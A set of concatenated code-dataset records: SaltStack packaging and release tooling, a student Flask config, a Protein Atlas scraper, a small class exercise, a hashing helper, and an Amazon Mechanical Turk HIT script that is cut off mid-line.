description=__doc__)\n\n\nclass Recompress:\n \"\"\"\n Helper class to re-compress a ``.tag.gz`` file to make it reproducible.\n \"\"\"\n\n def __init__(self, mtime):\n self.mtime = int(mtime)\n\n def tar_reset(self, tarinfo):\n \"\"\"\n Reset user, group, mtime, and mode to create reproducible tar.\n \"\"\"\n tarinfo.uid = tarinfo.gid = 0\n tarinfo.uname = tarinfo.gname = \"root\"\n tarinfo.mtime = self.mtime\n if tarinfo.type == tarfile.DIRTYPE:\n tarinfo.mode = 0o755\n else:\n tarinfo.mode = 0o644\n if tarinfo.pax_headers:\n raise ValueError(tarinfo.name, tarinfo.pax_headers)\n return tarinfo\n\n def recompress(self, targz):\n \"\"\"\n Re-compress the passed path.\n \"\"\"\n tempd = pathlib.Path(tempfile.mkdtemp()).resolve()\n d_src = tempd.joinpath(\"src\")\n d_src.mkdir()\n d_tar = tempd.joinpath(targz.stem)\n d_targz = tempd.joinpath(targz.name)\n with tarfile.open(d_tar, \"w|\") as wfile:\n with tarfile.open(targz, \"r:gz\") as rfile:\n rfile.extractall(d_src)\n extracted_dir = next(pathlib.Path(d_src).iterdir())\n for name in sorted(extracted_dir.rglob(\"*\")):\n wfile.add(\n str(name),\n filter=self.tar_reset,\n recursive=False,\n arcname=str(name.relative_to(d_src)),\n )\n\n with open(d_tar, \"rb\") as rfh:\n with gzip.GzipFile(\n fileobj=open(d_targz, \"wb\"), mode=\"wb\", filename=\"\", mtime=self.mtime\n ) as gz: # pylint: disable=invalid-name\n while True:\n chunk = rfh.read(1024)\n if not chunk:\n break\n gz.write(chunk)\n targz.unlink()\n shutil.move(str(d_targz), str(targz))\n\n\n@pkg.command(\n name=\"set-salt-version\",\n arguments={\n \"salt_version\": {\n \"help\": (\n \"The salt version to write to 'salt/_version.txt'. If not passed \"\n \"it will be discovered by running 'python3 salt/version.py'.\"\n ),\n \"nargs\": \"?\",\n \"default\": None,\n },\n \"overwrite\": {\n \"help\": \"Overwrite 'salt/_version.txt' if it already exists\",\n },\n \"validate_version\": {\n \"help\": \"Validate, and normalize, the passed Salt Version\",\n },\n \"release\": {\n \"help\": \"When true, also update salt/versions.py to set the version as released\",\n },\n },\n)\ndef set_salt_version(\n ctx: Context,\n salt_version: str,\n overwrite: bool = False,\n validate_version: bool = False,\n release: bool = False,\n):\n \"\"\"\n Write the Salt version to 'salt/_version.txt'\n \"\"\"\n salt_version_file = tools.utils.REPO_ROOT / \"salt\" / \"_version.txt\"\n if salt_version_file.exists():\n if not overwrite:\n ctx.error(\"The 'salt/_version.txt' file already exists\")\n ctx.exit(1)\n salt_version_file.unlink()\n if salt_version is None:\n if not tools.utils.REPO_ROOT.joinpath(\".git\").exists():\n ctx.error(\n \"Apparently not running from a Salt repository checkout. \"\n \"Unable to discover the Salt version.\"\n )\n ctx.exit(1)\n ctx.info(\"Discovering the Salt version...\")\n ret = ctx.run(shutil.which(\"python3\"), \"salt/version.py\", capture=True)\n salt_version = ret.stdout.strip().decode()\n ctx.info(f\"Discovered Salt version: {salt_version!r}\")\n elif validate_version:\n ctx.info(f\"Validating and normalizing the salt version {salt_version!r}...\")\n with ctx.virtualenv(\n name=\"set-salt-version\",\n requirements_files=[tools.utils.REPO_ROOT / \"requirements\" / \"base.txt\"],\n ) as venv:\n code = f\"\"\"\n import sys\n import salt.version\n parsed_version = salt.version.SaltStackVersion.parse(\"{salt_version}\")\n if parsed_version.name is None:\n # When we run out of names, or we stop supporting version names\n # we'll need to remove this version check.\n print(\"'{{}}' is not a valid Salt Version.\".format(parsed_version), file=sys.stderr, flush=True)\n sys.exit(1)\n sys.stdout.write(str(parsed_version))\n sys.stdout.flush()\n \"\"\"\n ret = venv.run_code(code, capture=True, check=False)\n if ret.returncode:\n ctx.error(ret.stderr.decode())\n ctx.exit(ret.returncode)\n salt_version = ret.stdout.strip().decode()\n\n if not tools.utils.REPO_ROOT.joinpath(\"salt\").is_dir():\n ctx.error(\n \"The path 'salt/' is not a directory. Unable to write 'salt/_version.txt'\"\n )\n ctx.exit(1)\n\n try:\n tools.utils.REPO_ROOT.joinpath(\"salt/_version.txt\").write_text(salt_version)\n except Exception as exc:\n ctx.error(f\"Unable to write 'salt/_version.txt': {exc}\")\n ctx.exit(1)\n\n ctx.info(f\"Successfuly wrote {salt_version!r} to 'salt/_version.txt'\")\n\n version_instance = tools.utils.Version(salt_version)\n if release and not version_instance.is_prerelease:\n with open(tools.utils.REPO_ROOT / \"salt\" / \"version.py\", \"r+\") as rwfh:\n contents = rwfh.read()\n match = f\"info=({version_instance.major}, {version_instance.minor}))\"\n if match in contents:\n contents = contents.replace(\n match,\n f\"info=({version_instance.major}, {version_instance.minor}), released=True)\",\n )\n rwfh.seek(0)\n rwfh.write(contents)\n rwfh.truncate()\n\n ctx.info(\n f\"Successfuly marked {salt_version!r} as released in 'salt/version.py'\"\n )\n\n gh_env_file = os.environ.get(\"GITHUB_ENV\", None)\n if gh_env_file is not None:\n variable_text = f\"SALT_VERSION={salt_version}\"\n ctx.info(f\"Writing '{variable_text}' to '$GITHUB_ENV' file:\", gh_env_file)\n with open(gh_env_file, \"w\", encoding=\"utf-8\") as wfh:\n wfh.write(f\"{variable_text}\\n\")\n\n gh_output_file = os.environ.get(\"GITHUB_OUTPUT\", None)\n if gh_output_file is not None:\n variable_text = f\"salt-version={salt_version}\"\n ctx.info(f\"Writing '{variable_text}' to '$GITHUB_OUTPUT' file:\", gh_output_file)\n with open(gh_output_file, \"w\", encoding=\"utf-8\") as wfh:\n wfh.write(f\"{variable_text}\\n\")\n\n ctx.exit(0)\n\n\n@pkg.command(\n name=\"pre-archive-cleanup\",\n arguments={\n \"cleanup_path\": {\n \"help\": (\n \"The salt version to write to 'salt/_version.txt'. If not passed \"\n \"it will be discovered by running 'python3 salt/version.py'.\"\n ),\n \"metavar\": \"PATH_TO_CLEANUP\",\n },\n \"pkg\": {\n \"help\": \"Perform extended, pre-packaging cleanup routines\",\n },\n },\n)\ndef pre_archive_cleanup(ctx: Context, cleanup_path: str, pkg: bool = False):\n \"\"\"\n Clean the provided path of paths that should not be included in the archive.\n\n For example:\n\n * `__pycache__` directories\n * `*.pyc` files\n * `*.pyo` files\n\n When running on Windows and macOS, some additional cleanup is also done.\n \"\"\"\n with open(\n str(tools.utils.REPO_ROOT / \"pkg\" / \"common\" / \"env-cleanup-rules.yml\")\n ) as rfh:\n patterns = yaml.safe_load(rfh.read())\n\n if pkg:\n patterns = patterns[\"pkg\"]\n else:\n patterns = patterns[\"ci\"]\n\n if sys.platform.lower().startswith(\"win\"):\n patterns = patterns[\"windows\"]\n elif sys.platform.lower().startswith(\"darwin\"):\n patterns = patterns[\"darwin\"]\n else:\n patterns = patterns[\"linux\"]\n\n def unnest_lists(patterns):\n if isinstance(patterns, list):\n for pattern in patterns:\n yield from unnest_lists(pattern)\n else:\n yield patterns\n\n dir_patterns = set()\n for pattern in unnest_lists(patterns[\"dir_patterns\"]):\n dir_patterns.add(pattern)\n\n file_patterns = set()\n for pattern in unnest_lists(patterns[\"file_patterns\"]):\n file_patterns.add(pattern)\n\n for root, dirs, files in os.walk(cleanup_path, topdown=True, followlinks=False):\n for dirname in dirs:\n path = pathlib.Path(root, dirname).resolve()\n if not path.exists():\n continue\n match_path = path.as_posix()\n for pattern in dir_patterns:\n if fnmatch.fnmatch(str(match_path), pattern):\n ctx.info(\n f\"Deleting directory: {match_path}; Matching pattern: {pattern!r}\"\n )\n shutil.rmtree(str(path))\n break\n for filename in files:\n path = pathlib.Path(root, filename).resolve()\n if not path.exists():\n continue\n match_path = path.as_posix()\n for pattern in file_patterns:\n if fnmatch.fnmatch(str(match_path), pattern):\n ctx.info(\n f\"Deleting file: {match_path}; Matching pattern: {pattern!r}\"\n )\n try:\n os.remove(str(path))\n except FileNotFoundError:\n pass\n break\n\n\n@pkg.command(\n name=\"generate-hashes\",\n arguments={\n \"files\": {\n \"help\": \"The files to generate the hashes for.\",\n \"nargs\": \"*\",\n },\n },\n)\ndef generate_hashes(ctx: Context, files: list[pathlib.Path]):\n \"\"\"\n Generate \"blake2b\", \"sha512\" and \"sha3_512\" hashes for the passed files.\n \"\"\"\n for fpath in files:\n ctx.info(f\"* Processing {fpath} ...\")\n hashes = {}\n for hash_name in (\"blake2b\", \"sha512\", \"sha3_512\"):\n ctx.info(f\" * Calculating {hash_name} ...\")\n with fpath.open(\"rb\") as rfh:\n try:\n digest = hashlib.file_digest(rfh, hash_name) # type: ignore[attr-defined]\n except AttributeError:\n # Python < 3.11\n buf = bytearray(2**18) # Reusable buffer to reduce allocations.\n view = memoryview(buf)\n digest = getattr(hashlib, hash_name)()\n while True:\n size = rfh.readinto(buf)\n if size == 0:\n break # EOF\n digest.update(view[:size])\n digest_file_path = fpath.parent / f\"{fpath.name}.{hash_name.upper()}\"\n hexdigest = digest.hexdigest()\n ctx.info(f\" * Writing {digest_file_path} ...\")\n digest_file_path.write_text(digest.hexdigest())\n hashes[hash_name] = hexdigest\n hashes_json_path = fpath.parent / f\"{fpath.name}.json\"\n ctx.info(f\" * Writing {hashes_json_path} ...\")\n hashes_json_path.write_text(json.dumps(hashes))\n ctx.info(\"Done\")\n\n\n@pkg.command(\n name=\"source-tarball\",\n venv_config={\n \"requirements_files\": [\n tools.utils.REPO_ROOT / \"requirements\" / \"build.txt\",\n ]\n },\n)\ndef source_tarball(ctx: Context):\n shutil.rmtree(\"dist/\", ignore_errors=True)\n timestamp = ctx.run(\n \"git\",\n \"show\",\n \"-s\",\n \"--format=%at\",\n \"HEAD\",\n capture=True,\n ).stdout.strip()\n env = {\n **os.environ,\n **{\n \"SOURCE_DATE_EPOCH\": str(timestamp),\n },\n }\n ctx.run(\n \"python3\",\n \"-m\",\n \"build\",\n \"--sdist\",\n str(tools.utils.REPO_ROOT),\n env=env,\n check=True,\n )\n # Recreate sdist to be reproducible\n recompress = Recompress(timestamp)\n for targz in tools.utils.REPO_ROOT.joinpath(\"dist\").glob(\"*.tar.gz\"):\n ctx.info(f\"Re-compressing {targz.relative_to(tools.utils.REPO_ROOT)} ...\")\n recompress.recompress(targz)\n sha256sum = shutil.which(\"sha256sum\")\n if sha256sum:\n packages = [\n str(pkg.relative_to(tools.utils.REPO_ROOT))\n for pkg in tools.utils.REPO_ROOT.joinpath(\"dist\").iterdir()\n ]\n ctx.run(\"sha256sum\", *packages)\n ctx.run(\"python3\", \"-m\", \"twine\", \"check\", \"dist/*\", check=True)\n\n\n@pkg.command(\n name=\"pypi-upload\",\n venv_config={\n \"requirements_files\": [\n tools.utils.REPO_ROOT / \"requirements\" / \"build.txt\",\n ]\n },\n arguments={\n \"files\": {\n \"help\": \"Files to upload to PyPi\",\n \"nargs\": \"*\",\n },\n \"test\": {\n \"help\": \"When true, upload to test.pypi.org instead\",\n },\n },\n)\ndef pypi_upload(ctx: Context, files: list[pathlib.Path], test: bool = False):\n ctx.run(\n \"python3\", \"-m\", \"twine\", \"check\", *[str(fpath) for fpath in files], check=True\n )\n if test is True:\n repository_url = \"https://test.pypi.org/legacy/\"\n else:\n repository_url = \"https://upload.pypi.org/legacy/\"\n if \"TWINE_USERNAME\" not in os.environ:\n os.environ[\"TWINE_USERNAME\"] = \"__token__\"\n if \"TWINE_PASSWORD\" not in os.environ:\n ctx.error(\"The 'TWINE_PASSWORD' variable is not set. Cannot upload.\")\n ctx.exit(1)\n cmdline = [\n \"twine\",\n \"upload\",\n f\"--repository-url={repository_url}\",\n \"--username=__token__\",\n ]\n if test is True:\n cmdline.append(\"--skip-existing\")\n cmdline.extend([str(fpath) for fpath in files])\n ctx.info(f\"Running '{' '.join(cmdline)}' ...\")\n ret = ctx.run(*cmdline, check=False)\n if ret.returncode:\n ctx.error(ret.stderr.strip().decode())\n ctx.exit(ret.returncode)\n\n\n@pkg.command(\n name=\"configure-git\",\n arguments={\n \"user\": {\n \"help\": \"The git global username\",\n \"required\": False,\n },\n \"email\": {\n \"help\": \"The git global email\",\n \"required\": False,\n },\n },\n)\ndef configure_git(\n ctx: Context,\n user: str = \"Salt Project Packaging\",\n email: str = \"saltproject-packaging@vmware.com\",\n):\n cwd = pathlib.Path.cwd()\n ctx.info(\"Setting name and email in git global config\")\n ctx.run(\"git\", \"config\", \"--global\", \"user.name\", f\"'{user}'\")\n ctx.run(\"git\", \"config\", \"--global\", \"user.email\", f\"{email}\")\n ctx.info(f\"Adding {str(cwd)} as a safe directory\")\n ctx.run(\"git\", \"config\", \"--global\", \"--add\", \"safe.directory\", str(cwd))\n\n\n@pkg.command(\n name=\"apply-release-patch\",\n arguments={\n \"patch\": {\"help\": \"The git global username\"},\n \"delete\": {\n \"help\": \"Whether to delete the patch after applying\",\n \"required\": False,\n },\n },\n)\ndef apply_release_patch(ctx: Context, patch: pathlib.Path, delete: bool = False):\n patch = patch.resolve()\n ctx.info(\"Applying the release patch\")\n ctx.run(\"git\", \"am\", \"--committer-date-is-author-date\", patch.name)\n if delete:\n ctx.info(\"Deleting the release patch because --delete was passed\")\n patch.unlink()\n","repo_name":"saltstack/salt","sub_path":"tools/pkg/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15881,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"25957851069","text":"import os\nfrom flask import Flask\nfrom flask_moment import Moment\n\nSECRET_KEY = os.urandom(32)\n# Grabs the folder where the script runs.\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# Enable debug mode.\nDEBUG = True\n\n# Connect to the database\n\n\n# IMPLEMENT DATABASE URL\nSQLALCHEMY_DATABASE_URI = 'postgres://postgres:admin@localhost:5432/fyyur'\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\n\n","repo_name":"BaduraM/fyyur","sub_path":"projects/01_fyyur/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8274003512","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 17 17:29:40 2021\n\nProtein Atlas Access\n\n@author: Carrie\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\n\ntest_ID = \"ENSG00000178394\" #ID for the protein HTR1A\n#this protein is expressed in the ovaries, with both protein and RNA evidence\n\ndef get_protein_xml(ensID):\n \"\"\" Retrieves the XML file for a protein from the Protein Atlas\n \n Parameters\n ----------\n ensID : str\n an ensembl gene ID\n\n Returns\n -------\n paResp : requests.models.Response\n the XML file from the Protein Atlas for the gene of interest in the\n for of a Response object. \n \"\"\"\n #step 1, use ensID to generate the protein atlas URL\n #https://www.proteinatlas.org/ENSG00000178394.xml\n paURL = \"https://www.proteinatlas.org/\" + ensID + \".xml\"\n print(paURL)\n paResp = requests.get(paURL)\n #print(paResp.content)\n #paSoup = BeautifulSoup(paResp.content, 'lxml-xml', from_encoding = 'utf-8')\n #pretty = paSoup.prettify()\n #print(pretty[:1000])\n return paResp\n\n\ndef get_RNA_tissue_data(paResponse):\n \"\"\"parses the protein xml file to retrieve ovary-specific \n RNA expresssion data.\n \n Currently this function is written to only work for ovarian tissue.\n Once I have a better idea what I need, I might expand it to work for\n generic tissue types (and therefor take another argument)\n\n Parameters\n ----------\n paResponse : requests.models.Response\n The response object received from proteinatlas.org.\n Contains the atlas' xml file for a target protein. \n\n Returns\n -------\n float : the normalized RNA Expression\n\n \"\"\"\n #\n #Ovary\n normRNAExp = None\n paSoup = BeautifulSoup(paResponse.content, 'lxml-xml', \n from_encoding = 'utf-8')\n ovaryTissues = paSoup.find_all(ontologyTerms=\"UBERON:0000992\")\n #finds all the tissue tags with the ontologyTerms attribute for ovary\n allSiblings = []\n for tag in ovaryTissues:\n prevL = tag.find_previous_siblings(\"level\")\n nextL = tag.find_next_siblings(\"level\")\n #siblings with a tag will have expression level data\n siblings = prevL + nextL\n allSiblings.append(siblings) #this is a list of lists of tags\n #print(siblings)\n \n for sibL in allSiblings: #for each list of tags\n for sib in sibL: #for each tag\n if sib['type'] == 'normalizedRNAExpression':\n normRNAExp = sib['expRNA']\n if normRNAExp == None:\n print(\"no value was set for normRNAExp\")\n return float(normRNAExp)\n #In [147]: allSiblings[3][0]['type']\n #Out[147]: 'normalizedRNAExpression' \n\n# I think I need to find the tissue tag for ovary, then look at its siblings\n# bs has sibling search functionality. Can find all \"ontologyTerms\" tags\n# that have ontologyTerms=\"UBERON:0000992\" then check through siblings\n# to find \n# for example\n\ndef test_run():\n paR = get_protein_xml(test_ID)\n paS = get_RNA_tissue_data(paR)\n #tissueList = paS.find_all(has_tissue_and_ont)\n #tissueList = paS.find_all(ontologyTerms=\"UBERON:0000992\")\n #print(tissueList[0])\n #return tissueList\n\n #for t in tissueList:\n #print(t)\n #if t[\"ontologyTerms\"] == \"UBERON:0000992\":\n #print(t)\n #print(tag)\n #print(tag[\"ontologyTerms\"])\n #found = paS.find_all(organ=\"Female tissues\")\n #if len(found) == 0:\n # print(\"nothing found\")\n #else:\n # for i in range(min(10, len(found))):\n # print(found[i].prettify())\n\n return paS\n \n \n \n \n \n \n \n \n ","repo_name":"GradinaruLab/BMGF-Caltech","sub_path":"Archive/proteinAtlasAccess 3-10.py","file_name":"proteinAtlasAccess 3-10.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4416158842","text":"#!/usr/bin/python3\n\n'''\nthe module that contains the function\n'''\n\n\nclass Student:\n \"\"\"A class of students\"\"\"\n\n def __init__(self, first_name, last_name, age):\n \"\"\"Initialization of the instance variables\"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n item = (list, dict, str, int, bool)\n obj_dict = {}\n if attrs is None:\n for key, value in self.__dict__.items():\n if isinstance(value, (list, dict, str, int, bool)):\n obj_dict[key] = value\n else:\n for key, value in self.__dict__.items():\n if key in attrs and isinstance(value, item):\n obj_dict[key] = value\n return obj_dict\n","repo_name":"OfficialEcho95/alx-higher_level_programming","sub_path":"0x0B-python-input_output/10-student.py","file_name":"10-student.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12025924055","text":"\"\"\"Utils\n\nA small module that contains a collection of some useful functions.\n\n\"\"\"\n\nimport logging\nfrom hashlib import sha256\nfrom io import BufferedRandom, BufferedReader, BufferedWriter, BytesIO\nfrom typing import Union\n\nlogger = logging.getLogger(__name__)\n\n\ndef sha256_hash(\n data: Union[bytes, BufferedWriter, BufferedReader, BufferedRandom]\n) -> str:\n \"\"\"Get the sha256 hash value of the passed data.\n\n Args:\n data (Union[bytes, BufferedWriter, BufferedReader, BufferedRandom]): Digested data.\n\n Raises:\n NotImplementedError: Raised when the data argument is not implemented.\n\n Returns:\n str: The sha256 hash value.\n \"\"\"\n # buffer_size is totally arbitrary, change for your app!\n buffer_size = 65536 # lets read stuff in 64kb chunks!\n hashalgo = sha256()\n if isinstance(data, bytes):\n stream = BytesIO(data)\n elif isinstance(data, str):\n stream = BytesIO(data.encode(\"utf-8\"))\n elif isinstance(data, (BufferedWriter, BufferedReader, BufferedRandom)):\n stream = data\n else:\n raise NotImplementedError(\n type(data), \"if you try to open a file please use binary mode ('b')\"\n )\n\n while True:\n data = stream.read(buffer_size)\n if not data:\n break\n hashalgo.update(data)\n return hashalgo.hexdigest()\n","repo_name":"wenzfe/analysis-of-ransomware-attacks","sub_path":"src/package_mwutils/mwutils/utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7387207421","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom tkinter import *\nfrom matplotlib import pyplot\nfrom PIL import ImageTk, Image\nimport numpy as np\nimport scipy.optimize as op\nimport boto3\nimport html\nimport collections\nimport itertools\nimport operator\nimport json\n\n\ndef clear_text(event):\n event.widget.delete(0, \"end\")\n\n\ndef choose_test(test_type, window, wave=1):\n global test\n test = test_type\n global is_First_wave\n is_First_wave = wave\n window.destroy()\n\n\ndef add_window(root=None):\n addwindow = Toplevel(root)\n addwindow.title(\"Add HIT\")\n addwindow.grab_set()\n\n # Creating label and entry\n label_title = Label(addwindow, text=\"Title of the HIT\")\n label_title.pack(side=TOP)\n title = Entry(addwindow, width=30)\n title.insert(0, \"Guess all the characters in a sentence\")\n title.bind(\"\", clear_text)\n title.pack(side=TOP)\n\n label_description = Label(addwindow, text=\"Description of the HIT\")\n label_description.pack(side=TOP)\n description = Entry(addwindow, width=30)\n description.insert(\n 0,\n \"Given a random sentence, find all the characters of the sentence one by one.\",\n )\n description.bind(\"\", clear_text)\n description.pack(side=TOP)\n\n label_keyword = Label(addwindow, text=\"Keywords for the HIT\")\n label_keyword.pack(side=TOP)\n keyword = Entry(addwindow, width=30)\n keyword.insert(0, \"Natural language, artificial intelligence, information theory\")\n keyword.bind(\"\", clear_text)\n keyword.pack(side=TOP)\n\n label_reward = Label(addwindow, text=\"Amount of money for the HIT\")\n label_reward.pack(side=TOP)\n reward = Entry(addwindow, width=30)\n reward.insert(0, \"0.1\")\n reward.bind(\"\", clear_text)\n reward.pack(side=TOP)\n\n label_maxAssign = Label(addwindow, text=\"Maximum assignments of the HIT\")\n label_maxAssign.pack(side=TOP)\n maxAssign = Entry(addwindow, width=30)\n maxAssign.insert(0, \"9\")\n maxAssign.bind(\"\", clear_text)\n maxAssign.pack(side=TOP)\n\n label_duration = Label(addwindow, text=\"Duration of the HIT\")\n label_duration.pack(side=TOP)\n duration = Entry(addwindow, width=30)\n duration.insert(0, \"604800\") # 2 days\n duration.bind(\"\", clear_text)\n duration.pack(side=TOP)\n\n label_workingTime = Label(\n addwindow, text=\"Time available for the worker for the HIT\"\n )\n label_workingTime.pack(side=TOP)\n workingTime = Entry(addwindow, width=30)\n workingTime.insert(0, \"1200\") # 20 minutes\n workingTime.bind(\"\", clear_text)\n workingTime.pack(side=TOP)\n\n label_approvalDelay = Label(addwindow, text=\"Time of approval of the HIT\")\n label_approvalDelay.pack(side=TOP)\n approvalDelay = Entry(addwindow, width=30)\n approvalDelay.insert(0, \"172800\") # 1 day\n approvalDelay.bind(\"\", clear_text)\n approvalDelay.pack(side=TOP)\n\n validation = Button(\n addwindow,\n text=\"Validate\",\n command=lambda: validate(\n title.get(),\n description.get(),\n keyword.get(),\n reward.get(),\n maxAssign.get(),\n duration.get(),\n workingTime.get(),\n approvalDelay.get(),\n addwindow,\n ),\n )\n validation.pack(side=TOP)\n\n\ndef validate(\n title,\n description,\n keyword,\n reward,\n maxAssign,\n duration,\n workingTime,\n approvalDelay,\n window,\n):\n assert title, \"Title must be indicated!\"\n assert description, \"You must provide a description for the HIT\"\n assert keyword, \"You must provide keyword(s) for the HIT\"\n assert reward.replace(\n \".\", \"\", 1\n ).isdigit(), \"You must indicate the amount of reward\"\n assert maxAssign.isnumeric(), \"Maximum assignment must be provided\"\n assert duration.isnumeric(), \"You must indicate the assignment duration\"\n assert workingTime.isnumeric(), \"You must indicate the working time\"\n\n print(\n \"you have entered:\",\n title,\n description,\n keyword,\n reward,\n maxAssign,\n duration,\n workingTime,\n approvalDelay,\n )\n\n if test == \"gambling\":\n if is_First_wave == 1:\n file = open(prefix + \"HIT_list\" + wave_number + \".txt\", \"a\")\n wave_number_file = open(prefix + \"wave_number_file.txt\", \"w\")\n wave_number_file.write(\"1\")\n wave_number_file.close()\n random_sentence = open(\"parse_text.txt\", \"r\").read().splitlines()\n else:\n list_sentence = [] # to store sentences that have already been pubulished\n file = open(prefix + \"HIT_list\" + str(int(wave_number) + 1) + \".txt\", \"a\")\n previous_result = open(\n prefix + \"Submitted_result/submitted_result\" + wave_number + \".txt\", \"r\"\n )\n with open(prefix + \"wave_number_file.txt\", \"r+\") as wave_number_file:\n wave_number_file.seek(0)\n wave_number_file.write(str(int(wave_number) + 1))\n wave_number_file.truncate()\n else:\n random_sentence = open(\"parse_text.txt\", \"r\").read().splitlines()\n file = open(prefix + \"HIT_list.txt\", \"a\")\n\n for i in range(12): # Number of HIT\n ### Gambling test\n if test == \"gambling\":\n if is_First_wave == 1:\n # list_sentence=[]\n # list_sentence.append('\"'+random_sentence[i*2+ii]+'\"')\n new_hit = mturk.create_hit(\n Title=title,\n Description=description,\n Keywords=keyword,\n Reward=reward, # Amount of money per HIT (in $)\n MaxAssignments=int(\n maxAssign\n ), # Number of slot available for worker\n LifetimeInSeconds=int(duration), # Time until the HIT end\n AssignmentDurationInSeconds=int(workingTime), # Time of work\n AutoApprovalDelayInSeconds=int(approvalDelay),\n Question=question.replace(\n \"replace sentence here\", random_sentence[i]\n ),\n QualificationRequirements=[\n {\n \"QualificationTypeId\": \"00000000000000000071\",\n \"Comparator\": \"In\",\n \"LocaleValues\": [\n {\"Country\": \"GB\"},\n {\"Country\": \"US\"},\n {\"Country\": \"CA\"},\n {\"Country\": \"AU\"},\n ],\n }\n ],\n )\n # question_form = question.replace(\"replace sentence here\", \",\".join(list_sentence))\n else:\n # list_start_character_index = []\n # list_capital = []\n while True:\n tmp = previous_result.readline().split(\"&\")\n # print(\"\\n\\ncest tmp2\",tmp[2][len('Answer: '):],\"\\n\\n\")\n previous_sentence = tmp[2][len(\"Answer: \") :]\n if previous_sentence not in list_sentence:\n list_sentence.append(previous_sentence)\n question_form = question.replace(\n \"replace sentence here\", previous_sentence\n )\n break\n # list_start_character_index.append(tmp[3])\n # list_capital.append(tmp[4].split(\",\")[-1])\n\n question_form = question_form.replace(\n \"replace start character index here\", tmp[3]\n )\n # question_form = question_form.replace(\"replace start fund here\", \",\".join(list_capital))\n new_hit = mturk.create_hit(\n Title=title,\n Description=description,\n Keywords=keyword,\n Reward=reward, # Amount of money per HIT (in $)\n MaxAssignments=int(\n maxAssign\n ), # Number of slot available for worker\n LifetimeInSeconds=int(duration), # Time until the HIT end\n AssignmentDurationInSeconds=int(workingTime), # Time of work\n AutoApprovalDelayInSeconds=int(approvalDelay),\n Question=question_form,\n QualificationRequirements=[\n {\n \"QualificationTypeId\": \"00000000000000000071\",\n \"Comparator\": \"In\",\n \"LocaleValues\": [\n {\"Country\": \"GB\"},\n {\"Country\": \"US\"},\n {\"Country\": \"CA\"},\n {\"Country\": \"AU\"},\n ],\n }\n ],\n )\n # test_fichier = open(\"../test/test.html\",\"w\")\n # test_fichier.write(question_form)\n # test_fichier.close()\n\n ### Other test than gambling\n else:\n new_hit = mturk.create_hit(\n Title=title,\n Description=description,\n Keywords=keyword,\n Reward=reward, # Amount of money per HIT (in $)\n MaxAssignments=int(maxAssign), # Number of slot available for worker\n LifetimeInSeconds=int(duration), # Time until the HIT end\n AssignmentDurationInSeconds=int(workingTime), # Time of work\n AutoApprovalDelayInSeconds=int(approvalDelay),\n Question=question.replace(\"replace here\", random_sentence[i]),\n # QualificationRequirements = [\n # {\n # 'QualificationTypeId': '00000000000000000071',\n # 'Comparator': 'In',\n # 'LocaleValues': [\n # {'Country': 'GB'}, {'Country': 'US'}, {'Country': 'CA'}, {'Country': 'AU'}\n # ]\n # }\n # ]\n )\n\n print(\"A new HIT has been created. You can preview it here:\")\n print(\n \"https://workersandbox.mturk.com/mturk/preview?groupId=\"\n + new_hit[\"HIT\"][\"HITGroupId\"]\n )\n print(\"HITID = \" + new_hit[\"HIT\"][\"HITId\"] + \" (Use to Get Results)\")\n\n file.write(new_hit[\"HIT\"][\"HITId\"] + \"\\n\")\n\n file.close()\n\n window.destroy()\n\n\ndef result_window(root=None):\n resultwindow = Toplevel(root)\n resultwindow.title(\"Reviewing HITs\")\n resultwindow.grab_set()\n\n submitted = Button(\n resultwindow, text=\"Retrieve all submitted answer\", command=retrieve_all\n )\n submitted.pack(side=TOP)\n\n\n# Only view submitted assigment\ndef retrieve_submitted():\n # if test==\"gambling\":\n # if is_First_wave==1:\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result\"+wave_number+\".txt\",\"w\")\n # else:\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result\"+wave_number+\".txt\",\"w\")\n # else:\n # file = open(prefix+\"HIT_list.txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result.txt\",\"w\")\n\n # for HIT in file:\n # print(HIT)\n # answer = mturk.list_assignments_for_hit(HITId=HIT[:-1], AssignmentStatuses=['Submitted'])\n # for i in answer['Assignments']:\n # result = i[\"Answer\"]\n # result = html.unescape(\"AssignmentId: \"+i[\"AssignmentId\"] + \"&WorkerId: \" + i[\"WorkerId\"] + \"&Answer: \" + result[result.find(\"\")+len(\"\"):result.find(\"\")] +\"\\n\")\n # submitted_result.write(result)\n\n # file.close()\n # submitted_result.close()\n\n analyse_result()\n\n\ndef retrieve_all():\n # if test==\"gambling\":\n # if is_First_wave==1:\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result\"+wave_number+\".txt\",\"w\")\n # else:\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result\"+wave_number+\".txt\",\"w\")\n # else:\n # file = open(prefix+\"HIT_list.txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result.txt\",\"w\")\n\n # for HIT in file:\n # print(HIT)\n # answer = mturk.list_assignments_for_hit(HITId=HIT[:-1], 